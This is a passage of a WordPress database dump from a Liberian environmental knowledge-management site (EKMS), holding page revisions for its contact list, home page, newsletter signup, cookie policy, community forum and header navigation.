href=\"mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a></p><p>Manager - Compliance and Enforcement, EPA<br />jjallah@epa.gov.lr</p>Assistant Manager - Compliance and Enforcement, ESIA, EPA\nkawumtoure@gmail.com<p><strong>Konikay Nimely</strong><br />EIA Manager, FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><strong>Edward S. Kamara</strong><br>\nMarketing and Forest Forecast<br>\n<a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a><strong>Blamah Goll</strong><br>\nConservation Manager, FDA<br>\n<a href=\"mailto:blamag@gmail.com\">blamag@gmail.com</a><br>\n<a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a><strong>Francis W. Mwah</strong><br>\nDirector @ MOA<br>\n<a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a><strong>John Willabo Johnson </strong><br>\nAssistant Minister, MME<br>\n<a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a><strong>Urias Garsinii </strong><br>\nLand Use Management Manager, LLA<br>\n<a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a><strong>Aaron S.M. Wesseh</strong><br>\nManager, CCCD Project<br>\n<a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2019-11-28 02:00:54','2019-11-28 02:00:54','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(2902,1,'2019-11-28 14:00:17','2019-11-28 14:00:17','<h2>Welcome to the EKMS</h2>		\n		<p>The EKMS provides free and open access to information from key government and partner institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Topics, Institutions and Documents.</p>		\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" value=\"{&quot;search_source&quot;:[&quot;document&quot;,&quot;institution&quot;,&quot;mea_resource&quot;,&quot;project_resource&quot;,&quot;related_topic&quot;],&quot;search_taxonomy&quot;:&quot;resource_category&quot;,&quot;include_terms_ids&quot;:&quot;&quot;,&quot;exclude_terms_ids&quot;:&quot;&quot;,&quot;exclude_posts_ids&quot;:&quot;&quot;,&quot;custom_fields_source&quot;:&quot;&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n							<input type=\"hidden\" value=\"document,institution,mea_resource,project_resource,related_topic\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"Entire Resource\" id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>Entire Resource</option>\n	<option value=\"76\">Case Studies</option>\n	<option value=\"78\">Conventions</option>\n	<option value=\"79\">Factsheets</option>\n	<option value=\"161\">Guidelines</option>\n	<option value=\"82\">Leaflets</option>\n	<option value=\"84\">Newsletters</option>\n	<option value=\"85\">Policies</option>\n	<option value=\"209\">Project Document</option>\n	<option value=\"86\">Reports</option>\n	<option value=\"178\">Research</option>\n	<option value=\"88\">Strategy and Action Plans</option>\n	<option value=\"89\">Toolkits</option>\n</select>\n<button type=\"submit\"></button>\n</form>\n<button> Results</button>\n				<button>See all results</button>				\n			<h1>Select a Topic</h1>		\n			</i>\",\"nextArrow\":\"<i class=\"fa fa-angle-left jet-arrow-next jet-blog-arrow\"></i>\",\"autoplay\":false,\"autoplaySpeed\":5000,\"rtl\":false}\' dir=\"ltr\">\n												Local Communities and Indigenous People																			\n		<a href=\"https://ekmsliberia.info/related-topic/local-communities-and-indigenous-people/\" aria-label=\"Local Communities and Indigenous People\"></a>\n												Land and Climate																			\n		<a href=\"https://ekmsliberia.info/related-topic/land-and-climate/\" aria-label=\"Land and Climate\"></a>\n												Forest Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/forest-biodiversity/\" aria-label=\"Forest Biodiversity\"></a>\n												Inland Waters Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/inland-waters-biodiversity/\" aria-label=\"Inland Waters Biodiversity\"></a>\n												Marine and Coastal Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/marine-and-coastal-biodiversity/\" aria-label=\"Marine and Coastal Biodiversity\"></a>\n			<a href=\"https://ekmsliberia.info/related-topics/\" role=\"button\">\n						Explore All Topics\n					</a>\n			<h2>Explore by Institution</h2>		\n		<p>Explore Government and partner Institutions that have direct linkages with environmental policies and development.</p>		\n			<a href=\"https://ekmsliberia.info/institutions-resources/\" role=\"button\">\n						Explore By Insitution\n					</a>\n			<h2>Explore by Document</h2>		\n		<p>Explore the EKMS Documents Database.</p>		\n			<a href=\"https://ekmsliberia.info/documents-database/\" role=\"button\">\n						Explore All Documents\n					</a>\n			<h1>Latest News & Blogs</h1>		\n	<a href=\"https://ekmsliberia.info/epa-undp-built-system-to-hold-environmental-data/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/pic1-1.jpg\" alt=\"EPA, UNDP Built System To Hold Environmental Data\" width=\"1024\" height=\"530\"></a><a href=\"https://ekmsliberia.info/category/news/\">News</a><h4><a href=\"https://ekmsliberia.info/epa-undp-built-system-to-hold-environmental-data/\">EPA, UNDP Built System To Hold Environmental Data</a></h4>The Environmental Protection Agency of Liberia (EPA) and the United&hellip;\n	<a href=\"https://ekmsliberia.info/giz-partners-with-ministry-of-mines-energy-to-develop-artisinal-mining-regulatory-roadmap/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/Illicit-mining.jpg\" alt=\"GIZ Partners With Ministry of Mines &amp; Energy to Develop Artisinal Mining Regulatory Roadmap\" width=\"1024\" height=\"530\"></a><a href=\"https://ekmsliberia.info/category/news/\">News</a><h4><a href=\"https://ekmsliberia.info/giz-partners-with-ministry-of-mines-energy-to-develop-artisinal-mining-regulatory-roadmap/\">GIZ Partners With Ministry of Mines & Energy to Develop...</a></h4>Recognizing the immense potential for the artisanal mining sector to&hellip;\n	<a href=\"https://ekmsliberia.info/fda-to-build-new-dock-at-lake-piso/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/FDA-MD.jpg\" alt=\"FDA to Build New Dock at Lake Piso\" width=\"1024\" height=\"530\"></a><a href=\"https://ekmsliberia.info/category/news/\">News</a><h4><a href=\"https://ekmsliberia.info/fda-to-build-new-dock-at-lake-piso/\">FDA to Build New Dock at Lake Piso</a></h4>A joint team of FDA and GSA technicians working with&hellip;\n	<a href=\"https://ekmsliberia.info/fda-boss-wants-forest-rangers-armed/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/pic2.jpg\" alt=\"FDA Boss Wants Forest Rangers Armed\" width=\"1024\" height=\"530\"></a><a href=\"https://ekmsliberia.info/category/news/\">News</a><h4><a href=\"https://ekmsliberia.info/fda-boss-wants-forest-rangers-armed/\">FDA Boss Wants Forest Rangers Armed</a></h4>The Managing Director of the Forestry Development Authority (FDA) C.&hellip;\n			<a href=\"https://ekmsliberia.info/news-and-blogs/\" role=\"button\">\n						Read All News & Blogs\n					</a>\n									<h3>\n						Start Contributing to the EKMS					</h3>\n									<p>Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resources by submitting a blog, news, case study, report or a publication?</p>\n					<a href=\"https://ekmsliberia.info/contribute/\">\n						Join the team\n											</a>','Home','','inherit','closed','closed','','9-revision-v1','','','2019-11-28 14:00:17','2019-11-28 14:00:17','',9,'https://ekmsliberia.info/9-revision-v1/',0,'revision','',0),(2904,1,'2019-12-03 15:08:35','2019-12-03 15:08:35','<!-- wp:paragraph -->\n<p>Please subscribes to the EKMS newsletter to get more updates on news, blogs, latest documents and data on the implementation of the Rio Convention in Liberia.</p>\n<!-- /wp:paragraph -->\n\n<p></p>\n<p>[newsletter]</p>\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->','Subscribe to Our Newsletter','','publish','closed','closed','','newsletter','','','2019-12-05 00:18:00','2019-12-05 00:18:00','',0,'https://ekmsliberia.info/newsletter/',0,'page','',0),(2905,1,'2019-12-03 15:34:11','2019-12-03 15:34:11','<h1>Cookie Policy for Environmental Knowledge Management System</h1>\nThis is the Cookie Policy for Environmental Knowledge Management System, accessible from <a style=\"font-size: 15px; background-color: #ffffff;\" href=\"https://ekmsliberia.info\">https://ekmsliberia.info</a>\n<h2><strong>What Are Cookies</strong></h2>\nAs is common practice with almost all professional websites this site uses cookies, which are tiny files that are downloaded to your computer, to improve your experience. This page describes what information they gather, how we use it and why we sometimes need to store these cookies. We will also share how you can prevent these cookies from being stored however this may downgrade or \'break\' certain elements of the sites functionality.\n\nFor more general information on cookies see the Wikipedia article on HTTP Cookies.\n<h2><strong>How We Use Cookies</strong></h2>\nWe use cookies for a variety of reasons detailed below. Unfortunately in most cases there are no industry standard options for disabling cookies without completely disabling the functionality and features they add to this site. It is recommended that you leave on all cookies if you are not sure whether you need them or not in case they are used to provide a service that you use.\n<h2><strong>Disabling Cookies</strong></h2>\nYou can prevent the setting of cookies by adjusting the settings on your browser (see your browser Help for how to do this). Be aware that disabling cookies will affect the functionality of this and many other websites that you visit. Disabling cookies will usually result in also disabling certain functionality and features of the this site. Therefore it is recommended that you do not disable cookies.\n<h2><strong>The Cookies We Set</strong></h2>\n<ul>\n 	<li>Account related cookies\n\nIf you create an account with us then we will use cookies for the management of the signup process and general administration. These cookies will usually be deleted when you log out however in some cases they may remain afterwards to remember your site preferences when logged out.</li>\n 	<li>Login related cookies\n\nWe use cookies when you are logged in so that we can remember this fact. This prevents you from having to log in every single time you visit a new page. These cookies are typically removed or cleared when you log out to ensure that you can only access restricted features and areas when logged in.</li>\n 	<li>Email newsletters related cookies\n\nThis site offers newsletter or email subscription services and cookies may be used to remember if you are already registered and whether to show certain notifications which might only be valid to subscribed/unsubscribed users.</li>\n 	<li>Forms related cookies\n\nWhen you submit data to through a form such as those found on contact pages or comment forms cookies may be set to remember your user details for future correspondence.</li>\n 	<li>Site preferences cookies\n\nIn order to provide you with a great experience on this site we provide the functionality to set your preferences for how this site runs when you use it. In order to remember your preferences we need to set cookies so that this information can be called whenever you interact with a page is affected by your preferences.</li>\n</ul>\n<h2><strong>Third Party Cookies</strong></h2>\nIn some special cases we also use cookies provided by trusted third parties. The following section details which third party cookies you might encounter through this site.\n<ul>\n 	<li>This site uses Google Analytics which is one of the most widespread and trusted analytics solution on the web for helping us to understand how you use the site and ways that we can improve your experience. These cookies may track things such as how long you spend on the site and the pages that you visit so we can continue to produce engaging content.\n\nFor more information on Google Analytics cookies, see the official Google Analytics page.</li>\n 	<li>From time to time we test new features and make subtle changes to the way that the site is delivered. When we are still testing new features these cookies may be used to ensure that you receive a consistent experience whilst on the site whilst ensuring we understand which optimisations our users appreciate the most.</li>\n 	<li>We also use social media buttons and/or plugins on this site that allow you to connect with your social network in various ways. For these to work the following social media sites including; {List the social networks whose features you have integrated with your site?:12}, will set cookies through our site which may be used to enhance your profile on their site or contribute to the data they hold for various purposes outlined in their respective privacy policies.</li>\n</ul>\n<strong>More Information</strong>\n\nHopefully that has clarified things for you and as was previously mentioned if there is something that you aren\'t sure whether you need or not it\'s usually safer to leave cookies enabled in case it does interact with one of the features you use on our site.&nbsp;\n\nHowever if you are still looking for more information then you can contact us through one of our preferred contact methods:\n<ul>\n 	<li>Email: <a href=\"mailto:contact@ekmsliberia.info\">contact@ekmsliberia.info</a></li>\n</ul>','Cookies Privacy Policy','','inherit','closed','closed','','102-autosave-v1','','','2019-12-03 15:34:11','2019-12-03 15:34:11','',102,'https://ekmsliberia.info/102-autosave-v1/',0,'revision','',0),(2906,1,'2019-12-03 19:10:20','2019-12-03 19:10:20','<h2>The EKMS Community Forum</h2>		\n		Like other Social Media sites such as Facebook and Twitter, the EKMS Community Forum is a place where people go to exchange ideas and talk about the growing agenda and/or topics of the Rio Conventions implementation in Liberia.\nGenerally, topics opened for discussions are about cross-cutting issues relating to biodiversity, climate change and ways to combat desertification. To explore forum topics <a style=\"color: #3366ff;\" href=\"https://ekms-liberia.mn.co/feed\" target=\"_blank\" rel=\"noopener noreferrer\">Click here</a>.\nThe key purpose of the community forum is to provide a vehicle for EKMS Knowledge Brokers to assist you in responding to technical questions or problems that might arise from using the Environmental Knowledge Management System website or issues/questions relating to the Rio Conventions implementation in Liberia.\nFeel free to discuss issues and submit questions or useful links regarding the implementation of the Rio conventions in Liberia. Discussion is by all means restricted to registered users only. <strong>Please note that any inappropriate contents including topics/questions/comments/images/videos posted on the community forum, will be removed by the forum moderators.</strong>\nIf you are already a member of the EKMS community, please <a style=\"color: #3366ff;\" href=\"https://ekms-liberia.mn.co/sign_in?from=https%3A%2F%2Fekms-liberia.mn.co%2F\" target=\"_blank\" rel=\"noopener noreferrer\">Sign In</a> or <a href=\"https://ekms-liberia.mn.co/?autojoin=1\" target=\"_blank\" rel=\"noopener noreferrer\">Join Us!</a>','Join the Community','','inherit','closed','closed','','2503-revision-v1','','','2019-12-03 19:10:20','2019-12-03 19:10:20','',2503,'https://ekmsliberia.info/2503-revision-v1/',0,'revision','',0),(2907,1,'2019-12-03 19:10:26','2019-12-03 19:10:26','<h2>The EKMS Community Forum</h2>		\n		<p>Like other Social Media sites such as Facebook and Twitter, the EKMS Community Forum is a place where people go to exchange ideas and talk about the growing agenda and/or topics of the Rio Conventions implementation in Liberia.</p><p>Generally, topics opened for discussions are about cross-cutting issues relating to biodiversity, climate change and ways to combat desertification. To explore forum topics <a style=\"color: #3366ff;\" href=\"https://ekms-liberia.mn.co/feed\" target=\"_blank\" rel=\"noopener noreferrer\">Click here</a>.</p><p>The key purpose of the community forum is to provide a vehicle for EKMS Knowledge Brokers to assist you in responding to technical questions or problems that might arise from using the Environmental Knowledge Management System website or issues/questions relating to the Rio Conventions implementation in Liberia.</p><p>Feel free to discuss issues and submit questions or useful links regarding the implementation of the Rio conventions in Liberia. Discussion is by all means restricted to registered users only. <strong>Please note that any inappropriate contents including topics/questions/comments/images/videos posted on the community forum, will be removed by the forum moderators.</strong></p><p>If you are already a member of the EKMS community, please <a style=\"color: #3366ff;\" href=\"https://ekms-liberia.mn.co/sign_in?from=https%3A%2F%2Fekms-liberia.mn.co%2F\" target=\"_blank\" rel=\"noopener noreferrer\">Sign In</a> or <a href=\"https://ekms-liberia.mn.co/?autojoin=1\" target=\"_blank\" rel=\"noopener noreferrer\">Join Us!</a></p>','Join the Community','','inherit','closed','closed','','2503-revision-v1','','','2019-12-03 19:10:26','2019-12-03 19:10:26','',2503,'https://ekmsliberia.info/2503-revision-v1/',0,'revision','',0),(2908,1,'2019-12-03 19:14:05','2019-12-03 19:14:05','<h2>The EKMS Community Forum</h2>		\n		<p>Like other Social Media sites such as Facebook and Twitter, the EKMS Community Forum is a place where people go to exchange ideas and talk about the growing agenda and/or topics of the Rio Conventions implementation in Liberia.</p><p>Generally, topics opened for discussions are about cross-cutting issues relating to biodiversity, climate change and ways to combat desertification. To explore forum topics <a style=\"color: #3366ff;\" href=\"https://ekms-liberia.mn.co/feed\" target=\"_blank\" rel=\"noopener noreferrer\">Click here</a>.</p><p>The key purpose of the community forum is to provide a vehicle for EKMS Knowledge Brokers to assist you in responding to technical questions or problems that might arise from using the Environmental Knowledge Management System website or issues/questions relating to the Rio Conventions implementation in Liberia.</p><p>Feel free to discuss issues and submit questions or useful links regarding the implementation of the Rio conventions in Liberia. Discussion is by all means restricted to registered users only. <strong>Please note that any inappropriate contents including topics/questions/comments/images/videos posted on the community forum, will be removed by the forum moderators.</strong></p><p>If you are already a member of the EKMS community, please <a style=\"color: #3366ff;\" href=\"https://ekms-liberia.mn.co/sign_in?from=https%3A%2F%2Fekms-liberia.mn.co%2F\" target=\"_blank\" rel=\"noopener noreferrer\">Sign In</a> or <a href=\"https://ekms-liberia.mn.co/?autojoin=1\" target=\"_blank\" rel=\"noopener noreferrer\">Join Us!</a></p>','Join the Community','','inherit','closed','closed','','2503-revision-v1','','','2019-12-03 19:14:05','2019-12-03 19:14:05','',2503,'https://ekmsliberia.info/2503-revision-v1/',0,'revision','',0),(2909,1,'2019-12-04 08:00:47','2019-12-04 08:00:47','','featured_fda_program','Hon. Doryen and Partners at the lunched program marking World Chimpanzee Day Celebration','inherit','open','closed','','featured_fda_program','','','2019-12-04 08:01:13','2019-12-04 08:01:13','',2801,'https://ekmsliberia.info/wp-content/uploads/2019/11/featured_fda_program.jpg',0,'attachment','image/jpeg',0),(2910,1,'2019-12-04 08:00:58','2019-12-04 08:00:58','','featured_training_photo','Photo Credit: Alloycious David. Participants at the EKMS training workshop post for a group photo.','inherit','open','closed','','featured_training_photo','','','2019-12-04 08:03:28','2019-12-04 08:03:28','',2801,'https://ekmsliberia.info/wp-content/uploads/2019/11/featured_training_photo.jpg',0,'attachment','image/jpeg',0),(2911,1,'2019-12-12 12:49:01','2019-12-12 12:49:01','<!-- wp:paragraph -->\n<p>This is a story about the 2019 Young Entrepreneurs Awards winner: Prince Kwame Agbata, a youth who started up an initiative to tackle poor waste management.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><a href=\"https://www.unilever.com/about/inspiringaction/unilever-young-entrepreneurs-awards/awards-2019/coliba/\">https://www.unilever.com/about/inspiringaction/unilever-young-entrepreneurs-awards/awards-2019/coliba/</a></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p> </p>\n<!-- /wp:paragraph -->','How tragedy inspired one young entrepreneur to tackle Ghana’s plastic waste crisis','','publish','open','open','','how-tragedy-inspired-one-young-entrepreneur-to-tackle-ghanas-plastic-waste-crisis','','','2019-12-12 12:50:34','2019-12-12 12:50:34','',0,'https://ekmsliberia.info/?p=2911',206,'post','',0),(2914,1,'2019-12-04 23:41:57','2019-12-04 23:41:57','[newsletter]','Subscribe to Our Newsletter','','inherit','closed','closed','','2904-revision-v1','','','2019-12-04 23:41:57','2019-12-04 23:41:57','',2904,'https://ekmsliberia.info/2904-revision-v1/',0,'revision','',0),(2916,1,'2019-12-04 23:45:56','2019-12-04 23:45:56','<!-- wp:heading -->\n<h2>Get updates!</h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Please subscribes to our EKMS newsletter to get more update.</p>\n<!-- /wp:paragraph -->\n\n<p> </p>\n<p>[newsletter]</p>\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->','Subscribe to Our Newsletter','','inherit','closed','closed','','2904-revision-v1','','','2019-12-04 23:45:56','2019-12-04 23:45:56','',2904,'https://ekmsliberia.info/2904-revision-v1/',0,'revision','',0),(2918,1,'2019-12-05 00:05:32','2019-12-05 00:05:32','<!-- wp:heading -->\n<h2>Get updates!</h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Please subscribes to our EKMS newsletter to get more update.</p>\n<!-- /wp:paragraph -->\n\n<p></p>\n<p>[newsletter]</p>\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->','Subscribe to Our Newsletter','','inherit','closed','closed','','2904-revision-v1','','','2019-12-05 00:05:32','2019-12-05 00:05:32','',2904,'https://ekmsliberia.info/2904-revision-v1/',0,'revision','',0),(2919,1,'2019-12-05 00:07:52','2019-12-05 00:07:52','<!-- wp:paragraph -->\n<p>Please subscribes to the EKMS newsletter to get more updates on news, blogs, latest documents and data on the implementation of the Rio Convention in Liberia.</p>\n<!-- /wp:paragraph -->\n\n<p></p>\n<p>[newsletter]</p>\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->','Subscribe to Our Newsletter','','inherit','closed','closed','','2904-revision-v1','','','2019-12-05 00:07:52','2019-12-05 00:07:52','',2904,'https://ekmsliberia.info/2904-revision-v1/',0,'revision','',0),(2920,1,'2019-12-05 00:18:05','2019-12-05 00:18:05','<!-- wp:paragraph -->\n<p>Please subscribes to the EKMS newsletter to get more updates on news, blogs, latest documents and data on the implementation of the Rio Convention in Liberia.</p>\n<!-- /wp:paragraph -->\n\n<p></p>\n<p>[newsletter]</p>\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->','Subscribe to Our Newsletter','','inherit','closed','closed','','2904-autosave-v1','','','2019-12-05 00:18:05','2019-12-05 00:18:05','',2904,'https://ekmsliberia.info/2904-autosave-v1/',0,'revision','',0),(2922,1,'2019-12-05 02:13:20','2019-12-05 02:13:20','<a href=\"https://ekmsliberia.info/\" rel=\"home\"><img width=\"293\" height=\"300\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/seal.png\" alt=\"Official Website of the Environmental Knowledge Management System\" /></a>\n	<!-- #site-logo-inner -->\n<!-- #site-logo -->\n			<h2>Environmental Knowledge<br> Management System</h2>		\n		Join us to help grow the EKMS Community		\n			<a href=\"https://ekms-liberia.mn.co/\" target=\"_blank\" role=\"button\" rel=\"noopener noreferrer\">\n						Sign up, It\'s Free!\n					</a>\n			<nav id=\"site-navigation\" itemscope=\"itemscope\" itemtype=\"http://schema.org/SiteNavigationElement\">\n				<ul id=\"menu-main_menu\"><li id=\"menu-item-404\"><a href=\"https://ekmsliberia.info/\">Home</a></li><li id=\"menu-item-127\"><a>Knowledge Resources </a>\n<ul>\n	<li id=\"menu-item-125\"><a href=\"https://ekmsliberia.info/multilateral-environmental-agreements/\">Multilateral Environmental Agreements</a></li>	<li id=\"menu-item-117\"><a href=\"https://ekmsliberia.info/related-topics/\">Explore All Topics</a></li>	<li id=\"menu-item-123\"><a href=\"https://ekmsliberia.info/institutions-resources/\">Explore All Institutions</a></li>	<li id=\"menu-item-120\"><a href=\"https://ekmsliberia.info/documents-database/\">Explore All Documents</a></li></ul>\n</li><li id=\"menu-item-114\"><a href=\"https://ekmsliberia.info/about/\">About EKMS</a></li><li id=\"menu-item-118\"><a href=\"https://ekmsliberia.info/country-profile/\">Country Profile</a></li><li id=\"menu-item-129\"><a>Media &#038; Tools </a>\n<ul>\n	<li id=\"menu-item-115\"><a href=\"https://ekmsliberia.info/news-and-blogs/\">News &#038; Blogs</a></li>	<li id=\"menu-item-126\"><a href=\"https://ekmsliberia.info/vacancy/\">EKMS Bulletins</a></li>	<li id=\"menu-item-1842\"><a href=\"https://ekmsliberia.info/frequently-asked-questions/\">FAQ</a></li>	<li id=\"menu-item-124\"><a href=\"https://ekmsliberia.info/maps/\">Maps</a></li>	<li id=\"menu-item-2509\"><a href=\"https://ekmsliberia.info/join-the-community/\">Join the Community</a></li>	<li id=\"menu-item-2596\"><a target=\"_blank\" rel=\"noopener noreferrer\">Startup Online Meetings</a></li>	<li id=\"menu-item-2746\"><a target=\"_blank\" href=\"https://securedrive.ekmsliberia.info/\" rel=\"noopener noreferrer\">EKMS CloudDrive</a></li></ul>\n</li><li id=\"menu-item-116\"><a href=\"https://ekmsliberia.info/contact-us/\">Contact Us</a></li><li id=\"menu-item-2921\"><a target=\"_blank\" href=\"https://ekmsliberia.info/newsletter/\" rel=\"noopener noreferrer\">Subscribe</a></li><li><a href=\"#\"></a></li></ul>\n	<form method=\"get\" action=\"https://ekmsliberia.info/\">\n		<input type=\"search\" name=\"s\" autocomplete=\"off\" value=\"\" placeholder=\"Type then hit enter to search...\" />\n					</form>\n<!-- #searchform-header-replace -->\n			</nav><!-- #site-navigation -->\n					<!-- #site-navigation-wrap -->\n		<a href=\"#\">\n							Menu\n									Close\n						</a>\n	<!-- #oceanwp-mobile-menu-navbar -->\n	<nav itemscope=\"itemscope\" itemtype=\"http://schema.org/SiteNavigationElement\">\n		<ul id=\"menu-main_menu-1\"><li><a href=\"https://ekmsliberia.info/\">Home</a></li>\n<li><a>Knowledge Resources</a>\n<ul>\n	<li><a href=\"https://ekmsliberia.info/multilateral-environmental-agreements/\">Multilateral Environmental Agreements</a></li>\n	<li><a href=\"https://ekmsliberia.info/related-topics/\">Explore All Topics</a></li>\n	<li><a href=\"https://ekmsliberia.info/institutions-resources/\">Explore All Institutions</a></li>\n	<li><a href=\"https://ekmsliberia.info/documents-database/\">Explore All Documents</a></li>\n</ul>\n</li>\n<li><a href=\"https://ekmsliberia.info/about/\">About EKMS</a></li>\n<li><a href=\"https://ekmsliberia.info/country-profile/\">Country Profile</a></li>\n<li><a>Media &#038; Tools</a>\n<ul>\n	<li><a href=\"https://ekmsliberia.info/news-and-blogs/\">News &#038; Blogs</a></li>\n	<li><a href=\"https://ekmsliberia.info/vacancy/\">EKMS Bulletins</a></li>\n	<li><a href=\"https://ekmsliberia.info/frequently-asked-questions/\">FAQ</a></li>\n	<li><a href=\"https://ekmsliberia.info/maps/\">Maps</a></li>\n	<li><a href=\"https://ekmsliberia.info/join-the-community/\">Join the Community</a></li>\n	<li><a target=\"_blank\" rel=\"noopener noreferrer\">Startup Online Meetings</a></li>\n	<li><a target=\"_blank\" rel=\"noopener noreferrer\" href=\"https://securedrive.ekmsliberia.info/\">EKMS CloudDrive</a></li>\n</ul>\n</li>\n<li><a href=\"https://ekmsliberia.info/contact-us/\">Contact Us</a></li>\n<li><a target=\"_blank\" rel=\"noopener noreferrer\" href=\"https://ekmsliberia.info/newsletter/\">Subscribe</a></li>\n<li><a href=\"#\"></a></li></ul>\n	</nav>','Custom Header','','inherit','closed','closed','','30-revision-v1','','','2019-12-05 02:13:20','2019-12-05 02:13:20','',30,'https://ekmsliberia.info/30-revision-v1/',0,'revision','',0),(2923,1,'2019-12-05 02:13:46','2019-12-05 02:13:46','<a href=\"https://ekmsliberia.info/\" rel=\"home\"><img width=\"293\" height=\"300\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/seal.png\" alt=\"Official Website of the Environmental Knowledge Management System\" /></a>\n	<!-- #site-logo-inner -->\n<!-- #site-logo -->\n			<h2>Environmental Knowledge<br> Management System</h2>		\n		<p>Join Us to help grow the EKMS Community</p>		\n			<a href=\"https://ekms-liberia.mn.co/\" target=\"_blank\" role=\"button\" rel=\"noopener noreferrer\">\n						Sign up, It\'s Free!\n					</a>\n			<nav id=\"site-navigation\" itemscope=\"itemscope\" itemtype=\"http://schema.org/SiteNavigationElement\">\n				<ul id=\"menu-main_menu\"><li id=\"menu-item-404\"><a href=\"https://ekmsliberia.info/\">Home</a></li><li id=\"menu-item-127\"><a>Knowledge Resources </a>\n<ul>\n	<li id=\"menu-item-125\"><a href=\"https://ekmsliberia.info/multilateral-environmental-agreements/\">Multilateral Environmental Agreements</a></li>	<li id=\"menu-item-117\"><a href=\"https://ekmsliberia.info/related-topics/\">Explore All Topics</a></li>	<li id=\"menu-item-123\"><a href=\"https://ekmsliberia.info/institutions-resources/\">Explore All Institutions</a></li>	<li id=\"menu-item-120\"><a href=\"https://ekmsliberia.info/documents-database/\">Explore All Documents</a></li></ul>\n</li><li id=\"menu-item-114\"><a href=\"https://ekmsliberia.info/about/\">About EKMS</a></li><li id=\"menu-item-118\"><a href=\"https://ekmsliberia.info/country-profile/\">Country Profile</a></li><li id=\"menu-item-129\"><a>Media &#038; Tools </a>\n<ul>\n	<li id=\"menu-item-115\"><a href=\"https://ekmsliberia.info/news-and-blogs/\">News &#038; Blogs</a></li>	<li id=\"menu-item-126\"><a href=\"https://ekmsliberia.info/vacancy/\">EKMS Bulletins</a></li>	<li id=\"menu-item-1842\"><a href=\"https://ekmsliberia.info/frequently-asked-questions/\">FAQ</a></li>	<li id=\"menu-item-124\"><a href=\"https://ekmsliberia.info/maps/\">Maps</a></li>	<li id=\"menu-item-2509\"><a href=\"https://ekmsliberia.info/join-the-community/\">Join the Community</a></li>	<li id=\"menu-item-2596\"><a target=\"_blank\" rel=\"noopener noreferrer\">Startup Online Meetings</a></li>	<li id=\"menu-item-2746\"><a target=\"_blank\" href=\"https://securedrive.ekmsliberia.info/\" rel=\"noopener noreferrer\">EKMS CloudDrive</a></li></ul>\n</li><li id=\"menu-item-116\"><a href=\"https://ekmsliberia.info/contact-us/\">Contact Us</a></li><li id=\"menu-item-2921\"><a target=\"_blank\" href=\"https://ekmsliberia.info/newsletter/\" rel=\"noopener noreferrer\">Subscribe</a></li><li><a href=\"#\"></a></li></ul>\n	<form method=\"get\" action=\"https://ekmsliberia.info/\">\n		<input type=\"search\" name=\"s\" autocomplete=\"off\" value=\"\" placeholder=\"Type then hit enter to search...\" />\n					</form>\n<!-- #searchform-header-replace -->\n			</nav><!-- #site-navigation -->\n					<!-- #site-navigation-wrap -->\n		<a href=\"#\">\n							Menu\n									Close\n						</a>\n	<!-- #oceanwp-mobile-menu-navbar -->\n	<nav itemscope=\"itemscope\" itemtype=\"http://schema.org/SiteNavigationElement\">\n		<ul id=\"menu-main_menu-1\"><li><a href=\"https://ekmsliberia.info/\">Home</a></li>\n<li><a>Knowledge Resources</a>\n<ul>\n	<li><a href=\"https://ekmsliberia.info/multilateral-environmental-agreements/\">Multilateral Environmental Agreements</a></li>\n	<li><a href=\"https://ekmsliberia.info/related-topics/\">Explore All Topics</a></li>\n	<li><a href=\"https://ekmsliberia.info/institutions-resources/\">Explore All Institutions</a></li>\n	<li><a href=\"https://ekmsliberia.info/documents-database/\">Explore All Documents</a></li>\n</ul>\n</li>\n<li><a href=\"https://ekmsliberia.info/about/\">About EKMS</a></li>\n<li><a href=\"https://ekmsliberia.info/country-profile/\">Country Profile</a></li>\n<li><a>Media &#038; Tools</a>\n<ul>\n	<li><a href=\"https://ekmsliberia.info/news-and-blogs/\">News &#038; Blogs</a></li>\n	<li><a href=\"https://ekmsliberia.info/vacancy/\">EKMS Bulletins</a></li>\n	<li><a href=\"https://ekmsliberia.info/frequently-asked-questions/\">FAQ</a></li>\n	<li><a 